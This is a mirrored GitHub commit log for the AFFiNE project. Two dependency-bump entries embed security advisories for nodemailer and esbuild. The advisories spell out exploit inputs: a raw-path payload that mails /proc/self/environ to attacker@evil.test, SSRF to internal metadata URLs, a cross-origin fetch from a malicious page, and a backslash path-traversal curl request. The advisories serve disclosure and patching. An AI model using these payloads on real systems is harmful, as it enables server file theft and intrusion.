mirror of
https://github.com/toeverything/AFFiNE.git
synced 2026-07-01 17:50:50 +08:00
bb8454e7e1b897a2b198333705c8c24245211301
7173 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
bb8454e7e1 | refactor(native): cache & job runtime (#15139) | ||
|
|
7ea8800c99 |
chore: bump up nodemailer version to v9 [SECURITY] (#15134)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [nodemailer](https://nodemailer.com/) ([source](https://redirect.github.com/nodemailer/nodemailer)) | [`^8.0.11` → `^9.0.0`](https://renovatebot.com/diffs/npm/nodemailer/8.0.11/9.0.1) |  |  | --- ### Nodemailer: Message-level raw option bypasses disableFileAccess/disableUrlAccess, enabling arbitrary file read and full-response SSRF in the delivered message [GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f) <details> <summary>More information</summary> #### Details ##### Message-level `raw` option bypasses `disableFileAccess` / `disableUrlAccess`, enabling arbitrary file read and full-response SSRF in the sent message - **Target:** nodemailer/nodemailer, npm `nodemailer` **v9.0.0** (HEAD `4e58450eb490e5097a74b2b2cce35a8d9e21856e`) - **Verdict:** CONFIRMED (local PoC, no network) ##### Summary Nodemailer exposes `disableFileAccess` and `disableUrlAccess` so an application that passes **untrusted** message data to the library can forbid that data from reading local files or fetching URLs. Every attachment, alternative, `html`/`text`/`watchHtml`/`amp` and `icalEvent` content node honors these flags. **The message-level `raw` option does not.** `MailComposer.compile()` builds the root MIME node for a `raw` message **without** threading the two flags, so a `raw: { path: '/etc/passwd' }` or `raw: { href: 'http://169.254.169.254/…' }` message is read / fetched anyway, and the file or HTTP-response bytes become the **actual message that is sent** by every transport (SMTP, SES, sendmail, stream, JSON). An actor whose input the application intended to sandbox therefore obtains arbitrary local-file disclosure and a full-response SSRF primitive, delivered to a recipient the same actor can choose. This is the same vulnerability class as the already-published jsonTransport advisory **GHSA-wqvq-jvpq-h66f**, but a **distinct code path** (`raw` root node, not `normalize()`), and strictly higher impact: the jsonTransport bug only affected the locally-returned JSON, whereas this affects the delivered RFC822 message for all transports. ##### Affected component - `lib/mail-composer/index.js:34-35` — root cause: ```js if (this.mail.raw) { this.message = new MimeNode('message/rfc822', { newline: this.mail.newline }).setRaw(this.mail.raw); } ``` The `MimeNode` is constructed with only `{ newline }`. Compare the sibling node builders `_createMixed`/`_createAlternative`/`_createRelated`/`_createContentNode` (`lib/mail-composer/index.js:389-527`), which all pass `disableUrlAccess: this.mail.disableUrlAccess, disableFileAccess: this.mail.disableFileAccess`. - `lib/mime-node/index.js:51-52` — the constructor derives `this.disableFileAccess`/ `this.disableUrlAccess` solely from its own `options`; children do **not** inherit a parent's flags (`createChild`/`appendChild`, lines 175-194, pass options through verbatim). - `lib/mime-node/index.js:812` — `setRaw()` content is resolved through `this._getStream(this._raw)`. - `lib/mime-node/index.js:984-1010` — `_getStream` reads the file (`fs.createReadStream`, 995) or fetches the URL (`nmfetch`, 1009) **only guarded by `this.disableFileAccess`/`this.disableUrlAccess`**, which on the `raw` root node are `false`. - Reached from the normal send flow at `lib/mailer/index.js:188` (`mail.message = new MailComposer(mail.data).compile()`), so every transport is affected. ##### Reachability gate (hop-by-hop) 1. **Source.** Application calls `transporter.sendMail({ raw: <userControlled> , to: <userControlled> })` with `disableFileAccess: true` and/or `disableUrlAccess: true` configured on the transporter (forced onto `mail.data` in `lib/mailer/mail-message.js:36-40`) or per message. This is the exact scenario the flags exist for — the same precondition under which GHSA-wqvq-jvpq-h66f was accepted. 2. **Guard — the access flags.** For attachments the flag is enforced: a node created by `_createContentNode` carries `disableFileAccess`, so `_getStream` throws `EFILEACCESS`. **Bypass:** the `raw` branch (`compile():34-35`) never sets the flag on its node, so `this.disableFileAccess === false` and the guard at `mime-node:985` / `:999` is skipped. There is no other validation between `mail.raw` and the read; `raw` content shapes (`{path}`, `{href}`, stream, string, buffer) are accepted as-is by `setRaw`/`_getStream`. 3. **Sink.** `fs.createReadStream(content.path)` (file disclosure) or `nmfetch(content.href, …)` (SSRF). The resulting bytes are emitted as the message body by `createReadStream()`, which every transport pipes to its destination (`smtp-transport:233`, `smtp-pool/pool-resource:208`, `ses-transport:96`, `sendmail-transport:184`, `stream-transport:67`). No guard blocks the chain; the only guard (the access flags) is structurally absent on this node. ##### Root cause Inconsistent enforcement: the access policy is applied per-`MimeNode` via constructor options and must be re-passed at every node creation. The `raw`-message shortcut in `compile()` omits it, while all five other node builders include it. The flags are therefore enforced for every content type *except* the one that lets the caller supply a complete message body by path/URL. ##### Exploit path Application that sandboxes untrusted mail input (`disableFileAccess`/`disableUrlAccess` set): 1. Untrusted actor supplies `raw: { path: '/proc/self/environ' }` (or any server file: `/app/.env`, key material, etc.) and `to: attacker@evil.test`. 2. `compile()` builds the raw root node without the flags; the transport reads the file and sends its contents as the message → **arbitrary server-file exfiltration to an attacker-chosen mailbox.** 3. Alternatively `raw: { href: 'http://127.0.0.1:8080/admin' }` or a cloud metadata URL → Nodemailer fetches it server-side and delivers the full response body in the email → **full-response SSRF** (no blind-channel limitation). ##### Impact - **Confidentiality (High):** arbitrary local file read disclosed in the outgoing message; full-response SSRF to internal/metadata endpoints, also disclosed in the message. - **Integrity (Low):** attacker-fetched/file content is injected into the delivered mail. - The two protective flags an application relies on to contain untrusted input are silently ineffective for `raw`. ##### Preconditions The application (a) passes `disableFileAccess` and/or `disableUrlAccess` (the documented sandboxing flags) and (b) lets untrusted input influence the `raw` field (and, for maximal disclosure, `to`). No other configuration is required; all bundled transports are affected. This mirrors the accepted precondition of GHSA-wqvq-jvpq-h66f. ##### Severity - **AV** — message data routinely originates over the network in the apps these flags protect. - **AC** — a single crafted `raw` object; deterministic. - **PR** — the actor is a user whose input the app already treats as untrusted (the reason the flags are set); not fully anonymous in the typical deployment. - **UI** — no victim interaction. - **S** — impact within Nodemailer's process scope. - **C** — arbitrary file read **and** full-response SSRF, both delivered to an attacker-chosen recipient. (The sibling jsonTransport advisory used C:L because its leak stayed in locally-returned JSON; here the bytes leave the system in the sent message, so C:H is warranted.) - **I** — attacker injects fetched/file bytes into the outgoing message. - **A**. Note: if a deployment fixes the recipient (`to` not attacker-controlled) the disclosure channel narrows and the rating degrades toward the sibling's Medium; the High rating reflects the reasonable worst case where `raw` and `to` are both untrusted. ##### Adversarial re-read (attempts to refute) 1. **"`raw` content is by-design trusted, so the flags shouldn't apply."** Rejected: every other content path (attachments, alternatives, html/text, icalEvent) honors the flags, and the maintainer already accepted GHSA-wqvq-jvpq-h66f for exactly this "untrusted input + flag set" model. The asymmetry — attachment `{path}` is blocked but `raw:{path}` is not — is the bug, and the PoC's CONTROL case proves the flag is otherwise effective on the same file. 2. **"The raw node inherits the flags via rootNode."** Rejected by code and by PoC: `compile():35` constructs the node with `{ newline }` only; `MimeNode` constructor sets `this.disableFileAccess = !!options.disableFileAccess` → `false`; `rootNode` is itself; no inheritance exists. 3. **"The PoC leaks for an unrelated reason."** Rejected: the CONTROL message (`attachments:[{path}]`, same file, same transporter) returns `EFILEACCESS`; only the `raw:{path}` message leaks. The sentinel nonce exists solely in the temp file; the URL nonce is generated server-side and is only obtainable by an actual fetch. Both observables are uniquely bound to the bypass. 4. **"Maybe only jsonTransport (already reported) is affected."** Rejected: the PoC uses `streamTransport` and the root cause is in `MailComposer.compile()` (`mailer:188`), shared by all transports; jsonTransport is a different (already-fixed) path. I could not find any guard that blocks the chain; the finding survives. ##### Proof of concept (safe, benign) `findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` — local, no network egress (loopback only), no destructive action. Output: ``` [CONTROL] attachment path with disableFileAccess: BLOCKED (EFILEACCESS) — flag works here [ATTACK] raw:{path} with disableFileAccess=true: BYPASSED — sentinel file CONTENT present in message [ATTACK] raw:{href} with disableUrlAccess=true (loopback server): BYPASSED — fetched body present (SSRF) VERDICT: CONFIRMED ``` Run: `node findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` (exit 0 = confirmed). ##### Remediation Thread the access policy onto the `raw` root node, exactly as the other builders do: ```js if (this.mail.raw) { this.message = new MimeNode('message/rfc822', { newline: this.mail.newline, disableFileAccess: this.mail.disableFileAccess, disableUrlAccess: this.mail.disableUrlAccess }).setRaw(this.mail.raw); } ``` (Defense in depth: `setRaw`/`_getStream` could also refuse `{path}`/`{href}` raw content when either flag is set, regardless of how the node was constructed.) Add a regression test asserting that `raw:{path}` and `raw:{href}` reject with `EFILEACCESS`/`EURLACCESS` when the flags are set, mirroring the attachment tests. #### Severity - CVSS Score: 7.1 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N` #### References - [https://github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f) - [https://github.com/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>nodemailer/nodemailer (nodemailer)</summary> ### [`v9.0.1`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#901-2026-06-17) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v9.0.0...v9.0.1) ##### Bug Fixes - enforce disableFileAccess/disableUrlAccess for raw message option ([a82e060](https://redirect.github.com/nodemailer/nodemailer/commit/a82e060d978f27e5f41369a9a9807b1e3dedc2e2)) ### [`v9.0.0`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#900-2026-06-14) [Compare Source](https://redirect.github.com/nodemailer/nodemailer/compare/v8.0.11...v9.0.0) ##### ⚠ BREAKING CHANGES - HTTPS requests made while fetching remote content (attachment href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now validate the server's TLS certificate by default. Requests to hosts with self-signed, expired, or hostname-mismatched certificates that previously succeeded will now fail. Opt back out per request with tls.rejectUnauthorized=false (transport options, or a per-attachment `tls` option). ##### Bug Fixes - replace deprecated url.parse with a WHATWG URL wrapper ([0c080fb](https://redirect.github.com/nodemailer/nodemailer/commit/0c080fbf3278926f013a5c2ad06f5f6f0e18f5ed)) - validate TLS certificates by default when fetching remote content ([6a947ac](https://redirect.github.com/nodemailer/nodemailer/commit/6a947ac7114a16da1e6a50d9a6f4e17026ce145d)) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
e2624d93c7 |
fix(core): filters emojipicker on label in addition to tags (#15129)
Fixes #15116 # Issue Emojipicker keyword filtering only filtered on `tags`, and not `label`. So searching for an emoji's name would not result in said emoji ending up in the result. E.G. searching "sunflower" does not make 🌻 appear # Solution Adding an extra condition to the filter function to check if the keyword is a substring of an emoji's label # Result Search results now include emojis with that `label` <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Improved emoji picker search to include matches on both emoji labels and tags (case-insensitive), enabling broader search results for better discoverability. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
01d7ef88e3 |
chore: bump up esbuild version to ^0.28.0 [SECURITY] (#15128)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [esbuild](https://redirect.github.com/evanw/esbuild) | [`^0.25.12` → `^0.28.0`](https://renovatebot.com/diffs/npm/esbuild/0.25.12/0.28.1) |  |  | --- > [!WARNING] > Some dependencies could not be looked up. Check the [Dependency Dashboard](../issues/5188) for more information. --- ### esbuild enables any website to send any requests to the development server and read the response [GHSA-67mh-4wv8-2f99](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99) <details> <summary>More information</summary> #### Details ##### Summary esbuild allows any websites to send any request to the development server and read the response due to default CORS settings. ##### Details esbuild sets `Access-Control-Allow-Origin: *` header to all requests, including the SSE connection, which allows any websites to send any request to the development server and read the response. https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121 https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363 **Attack scenario**: 1. The attacker serves a malicious web page (`http://malicious.example.com`). 1. The user accesses the malicious web page. 1. The attacker sends a `fetch('http://127.0.0.1:8000/main.js')` request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above. 1. The attacker gets the content of `http://127.0.0.1:8000/main.js`. In this scenario, I assumed that the attacker knows the URL of the bundle output file name. But the attacker can also get that information by - Fetching `/index.html`: normally you have a script tag here - Fetching `/assets`: it's common to have a `assets` directory when you have JS files and CSS files in a different directory and the directory listing feature tells the attacker the list of files - Connecting `/esbuild` SSE endpoint: the SSE endpoint sends the URL path of the changed files when the file is changed (`new EventSource('/esbuild').addEventListener('change', e => console.log(e.type, e.data))`) - Fetching URLs in the known file: once the attacker knows one file, the attacker can know the URLs imported from that file The scenario above fetches the compiled content, but if the victim has the source map option enabled, the attacker can also get the non-compiled content by fetching the source map file. ##### PoC 1. Download [reproduction.zip](https://redirect.github.com/user-attachments/files/18561484/reproduction.zip) 2. Extract it and move to that directory 1. Run `npm i` 1. Run `npm run watch` 1. Run `fetch('http://127.0.0.1:8000/app.js').then(r => r.text()).then(content => console.log(content))` in a different website's dev tools.  ##### Impact Users using the serve feature may get the source code stolen by malicious websites. #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N` #### References - [https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99) - [https://github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d](https://redirect.github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d) - [https://github.com/advisories/GHSA-67mh-4wv8-2f99](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-67mh-4wv8-2f99) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### esbuild allows arbitrary file read when running the development server on Windows [GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr) <details> <summary>More information</summary> #### Details ##### Summary The development server contains a path traversal vulnerability on Windows when serving files from `servedir`. Due to the use of `path.Clean()` (which only normalizes forward-slash `/` separators) instead of a Windows-aware path normalization function, it is possible to craft requests using backslashes (`\`) that bypass the intended directory containment logic. An attacker can escape the configured `servedir` root and access arbitrary files on the filesystem. This issue affects Windows environments only. ##### Details The request path is sanitized using: ```go // https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165 queryPath := path.Clean(req.URL.Path)[1:] ``` However: - `path.Clean()` is POSIX-style and only understands `/` (docs: `https://pkg.go.dev/path#Clean`) - On Windows, `\` is a valid path separator - `path.Clean()` does not treat `\` as a separator Later, the server constructs the absolute path: ```go // https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L221 absPath := h.fs.Join(h.servedir, queryPath) ``` If `queryPath` contains sequences such as: ``` ..\..\..\..\..\..\..\Windows\system.ini ``` `path.Clean()` will not normalize them, but the Windows filesystem will interpret `\` as directory separators when resolving `absPath`. Because the implementation does not verify that the final resolved path remains within `servedir`, it allows directory traversal outside the intended root directory. ##### Vulnerable Code ```go // https://github.com/evanw/esbuild/blob/v0.27.3/pkg/api/serve_other.go#L165 queryPath := path.Clean(req.URL.Path)[1:] .... // Check for a file in the "servedir" directory if h.servedir != "" && kind != fs.FileEntry { absPath := h.fs.Join(h.servedir, queryPath) if absDir := h.fs.Dir(absPath); absDir != absPath { if entries, err, _ := h.fs.ReadDirectory(absDir); err == nil { if entry, _ := entries.Get(h.fs.Base(absPath)); entry != nil && entry.Kind(h.fs) == fs.FileEntry { .... ``` ##### Steps to reproduce ``` npm install --save-exact --save-dev esbuild echo "console.log(1)" > app.js .\node_modules\.bin\esbuild --version 0.27.3 .\node_modules\.bin\esbuild app.js --bundle --outdir=www --servedir=www --watch curl -i --path-as-is "http://localhost:8000/..\..\..\..\..\..\..\Windows\system.ini" <content of Windows\system.ini> ``` ##### Impact - Arbitrary file read on Windows - Exposure of sensitive files #### Severity - CVSS Score: 2.5 / 10 (Low) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N` #### References - [https://github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr) - [https://github.com/evanw/esbuild/releases/tag/v0.28.1](https://redirect.github.com/evanw/esbuild/releases/tag/v0.28.1) - [https://github.com/advisories/GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>evanw/esbuild (esbuild)</summary> ### [`v0.28.1`](https://redirect.github.com/evanw/esbuild/blob/HEAD/CHANGELOG.md#0281) [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.28.0...v0.28.1) - Disallow `\\` in local development server HTTP requests ([GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr)) This release fixes a security issue where HTTP requests to esbuild's local development server could traverse outside of the serve directory on Windows using a `\\` backslash character. It happened due to the use of Go's `path.Clean()` function, which only handles Unix-style `/` characters. HTTP requests with paths containing `\\` are no longer allowed. Thanks to [@​dellalibera](https://redirect.github.com/dellalibera) for reporting this issue. - Add integrity checks to the Deno API ([GHSA-gv7w-rqvm-qjhr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-gv7w-rqvm-qjhr)) The previous release of esbuild added integrity checks to esbuild's npm install script. This release also adds integrity checks to esbuild's Deno install script. Now esbuild's Deno API will also fail with an error if the downloaded esbuild binary contains something other than the expected content. Note that esbuild's Deno API installs from `registry.npmjs.org` by default, but allows the `NPM_CONFIG_REGISTRY` environment variable to override this with a custom package registry. This change means that the esbuild executable served by `NPM_CONFIG_REGISTRY` must now match the expected content. Thanks to [@​sondt99](https://redirect.github.com/sondt99) for reporting this issue. - Avoid inlining `using` and `await using` declarations ([#​4482](https://redirect.github.com/evanw/esbuild/issues/4482)) Previously esbuild's minifier sometimes incorrectly inlined `using` and `await using` declarations into subsequent uses of that declaration, which then fails to dispose of the resource correctly. This bug happened because inlining was done for `let` and `const` declarations by avoiding doing it for `var` declarations, which no longer worked when more declaration types were added. Here's an example: ```js // Original code { using x = new Resource() x.activate() } // Old output (with --minify) new Resource().activate(); // New output (with --minify) {using e=new Resource;e.activate()} ``` - Fix module evaluation when an error is thrown ([#​4461](https://redirect.github.com/evanw/esbuild/issues/4461), [#​4467](https://redirect.github.com/evanw/esbuild/pull/4467)) If an error is thrown during module evaluation, esbuild previously didn't preserve the state of the module for subsequent module references. This was observable if `import()` or `require()` is used to import a module multiple times. The thrown error is supposed to be thrown by every call to `import()` or `require()`, not just the first. With this release, esbuild will now throw the same error every time you call `import()` or `require()` on a module that throws during its evaluation. - Fix some edge cases around the `new` operator ([#​4477](https://redirect.github.com/evanw/esbuild/issues/4477)) Previously esbuild incorrectly printed certain edge cases involving complex expressions inside the target of a `new` expression (specifically an optional chain and/or a tagged template literal). The generated code for the `new` target was not correctly wrapped with parentheses, and either contained a syntax error or had different semantics. These edge cases have been fixed so that they now correctly wrap the `new` target in parentheses. Here is an example of some affected code: ```js // Original code new (foo()`bar`)() new (foo()?.bar)() // Old output new foo()`bar`(); new (foo())?.bar(); // New output new (foo())`bar`(); new (foo()?.bar)(); ``` - Fix renaming of nested `var` declarations ([#​4471](https://redirect.github.com/evanw/esbuild/issues/4471)) This release fixes a bug where `var` declarations in nested scopes that are hoisted up to module scope were not correctly being renamed during bundling. That could previously lead to name collisions when minification was disabled, which could potentially cause a behavior change. The bug has been fixed so that these hoisted declarations are now considered to be module-level symbols during the name collision avoidance pass. - Emit `var` instead of `const` for certain TypeScript-only constructs for ES5 ([#​4448](https://redirect.github.com/evanw/esbuild/issues/4448)) While esbuild doesn't generally support converting `const` to `var` for ES5 due to nested scoping rules (which is currently a build-time error), esbuild previously incorrectly converted TypeScript-only `import` assignment constructs into a `const` declaration even when targeting ES5. With this release, esbuild will now use `var` for this case instead: ```js // Original code import x = require('y') // Old output (with --target=es5) const x = require("y"); // New output (with --target=es5) var x = require("y"); ``` ### [`v0.28.0`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.7...v0.28.0) ### [`v0.27.7`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.5...v0.27.7) ### [`v0.27.5`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.4...v0.27.5) ### [`v0.27.4`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.3...v0.27.4) ### [`v0.27.3`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.2...v0.27.3) ### [`v0.27.2`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.1...v0.27.2) ### [`v0.27.1`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.0...v0.27.1) ### [`v0.27.0`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.26.0...v0.27.0) ### [`v0.26.0`]() [Compare Source](https://redirect.github.com/evanw/esbuild/compare/v0.25.12...v0.26.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMTkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIxOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
154d9e975d | fix: deps & config (#15126) | ||
|
|
24e07f73bb |
chore: bump up capacitor-plugin-app-tracking-transparency version to v3 (#15079)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [capacitor-plugin-app-tracking-transparency](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency) | [`^2.0.5` → `^3.0.0`](https://renovatebot.com/diffs/npm/capacitor-plugin-app-tracking-transparency/2.0.5/3.0.0) |  |  | --- ### Release Notes <details> <summary>mahnuh/capacitor-plugin-app-tracking-transparency (capacitor-plugin-app-tracking-transparency)</summary> ### [`v3.0.0`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/releases/tag/v3.0.0) [Compare Source](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/compare/v2.0.5...v3.0.0) - Add support for Swift Package Manager ([#​29](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/issues/29)) [`40051d6`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/40051d6) - Update README.md [`d8c4d27`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/d8c4d27) *** </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuNCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
d500e472f0 | chore: bump deps (#15124) | ||
|
|
13d9fe506e |
feat(native): cleanup vendored deps (#15119)
#### PR Dependency Tree * **PR #15119** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Breaking Changes** * Removed major Rust public APIs related to document/CRDT encoding, synchronization, and document loading from the affected packages. * **Chores** * Migrated internal dependency usage to published crates and trimmed the Rust workspace/feature surface. * **CI/CD** * Simplified the Rust CI pipeline by removing advanced testing jobs and updating job dependencies. * **Dev/Test/Bench** * Removed associated benchmark and fuzzing artifacts and related fixture/test utilities. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
1256d66938 |
fix(server): sync permission check (#15123)
fix #15121 #### PR Dependency Tree * **PR #15123** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Security Improvements** * Enforced document-level `Doc.Read`/`Doc.Update` checks for key sync websocket operations, including filtering workspace doc timestamp results to only readable documents. * Improved remote permission handling: once a remote denies access, syncing stops for the affected document and retry behavior is suppressed. * **Improvements** * `delete-doc` now relies on server acknowledgment and returns an explicit `{ success: true }`. * Websocket acknowledgment errors are now normalized for consistent error details. * **Tests** * Expanded permission-denied and websocket error-handling coverage, including timestamp filtering and no-retry behavior after permission denial. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
da7781a751 |
feat(mobile): improve android edgeless & ci (#15118)
#### PR Dependency Tree * **PR #15118** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Improved mobile CI workflow with change-aware Android/iOS build jobs and updated completion dependencies so tests wait for the relevant mobile builds. * **Performance / App Behavior** * Enhanced Android WebView behavior: improved viewport/WebView tuning, disabled zoom and scrollbars, and made mixed-content allowance environment-aware (debug vs non-debug). * Adjusted Android cleartext traffic handling based on build/debug settings and Capacitor server URL configuration. * **Tests** * Strengthened Electron BYOK storage tests with per-test temporary directories, mock control, and added coverage for when secure storage is unavailable. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
a77d89bb1a |
fix(editor): edgeless can't slider with finger (#15091)
fix bug edgeless can't slider with finger <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added mobile immersive edgeless mode with dynamic chrome auto-hide and tap-gesture controls. * Added a mobile zoom ruler UI for edgeless. * **Bug Fixes** * Improved iOS rendering/zoom by applying low-zoom survival behavior, gesture-aware refresh deferral, and effective-DPR canvas scaling. * Fixed iOS webview zoom/bounce and process-termination reload behavior. * Improved placeholder styling with theme-aware colors. * **Chores** * Updated local ignore rules and iOS app build/version configuration. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: DarkSky <darksky2048@gmail.com> |
||
|
|
07a08e6d4d |
fix(editor): import & save logic (#15098)
fix #15080 fix #15085 fix #15031 fix #15094 #### PR Dependency Tree * **PR #15098** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Improved code-block paste behavior for plain-text insertion * Fixed block selection ordering to reflect document model * Made table cell formatting resilient to conversion errors * Ensured user feature list is consistently returned as an array * **Refactor** * Streamlined authentication session fetch and profile enrichment flow * **Tests** * Added tests for markdown blockquote list preservation * Added authentication session validation tests <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
6faebcabd3 |
